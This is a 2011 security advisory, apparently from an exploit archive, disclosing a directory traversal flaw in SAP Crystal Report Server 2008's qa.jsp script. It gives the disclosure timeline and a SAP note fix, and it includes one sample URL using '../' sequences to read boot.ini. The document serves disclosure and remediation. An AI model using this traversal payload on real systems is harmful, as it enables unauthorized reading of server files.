SAP Crystal Report Server 2008 Directory Traversal

2011-01-27T00:00:00
ID 1337DAY-ID-15332
Type zdt
Reporter Dmitriy Chastuhin
Modified 2011-01-27T00:00:00

Description

Exploit for jsp platform in category web applications

                                        
                                            Application:                    SAP Crystal Report Server 2008
Versions Affected:               SAP Crystal Report Server 2008
Vendor URL:                     http://sap.com
Bugs:                           Directory Traversal File Read
Exploits:                        YES
Reported:                       29.03.2010
Vendor response:                30.03.2010
Date of SAPNOTE Published:    8.10.2010
Date of Public Advisory:        14.01.2011
Authors:                        Dmitriy Chastuhin
                        Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)
 
Description
********
SAP Crystal Report Server 2008 contains a variety of features with which users can manage and share interactive reports and dashboards, as well as provide access to them via the Internet.
 
Details
*******
Directory Traversal vulnerability was found in script qa.jsp
With this vulnerability, an authenticated attacker can read any file on the server.
 
Sample
******
http://sap_server_adr:8080/PerformanceManagement/jsp/qa.jsp?func=browse&root=wi&path=../../../../../../boot.ini
 
References
**********
 
http://dsecrg.com/pages/vul/show.php?id=303
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1476930
 
 
 
 
Fix Information
*************
 
Solution to this issue is given in the 1476930 security note.



#  0day.today [2018-04-08]  #